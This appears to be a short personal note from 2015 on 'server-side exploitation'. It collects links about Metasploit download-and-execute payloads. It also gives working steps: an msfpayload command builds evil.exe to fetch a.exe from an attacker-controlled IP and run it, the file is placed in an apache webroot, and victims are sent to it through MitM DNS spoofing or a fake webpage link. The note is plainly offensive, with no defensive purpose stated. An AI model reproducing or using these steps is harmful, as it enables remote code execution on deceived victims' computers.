pedro ubuntu - 2015-01-04



-:[ server-side exploitation methods ]:-


                  "WINDOWS/DOWNLOAD_EXEC"

http://www.governmentsecurity.org/forum/topic/18370-download-and-exec-payload/
http://www.r00tsec.com/2013/02/howto-single-staged-stagers-payload-of.html
http://www.room362.com/blog/2011/06/26/metasploit-payloads-explained-part-1/
http://www.thegreycorner.com/2010/05/download-and-execute-script-shellcode.html

  "generate payload"
  sudo msfpayload windows/download_exec url="http//192.168.1.68/a.exe" X > evil.exe

  "port payload to apache webroot"
  cp evil.exe /var/www/evil.exe

  then use "MitM+DNS_spoof" to point to apache evil.exe,
  thats going to make a.exe in C:\windows\a.exe and execute it
  Remark: clone 'firefox_xpi priv8.sh module' way to inject the URL into the HTML fake webpage





            "SERVER SIDE EXPLOITATION"
            send a url link to client

http://pt.scribd.com/doc/176198248/Back-Track-Tutorials#scribd



 

Last edit: pedro ubuntu 2015-01-04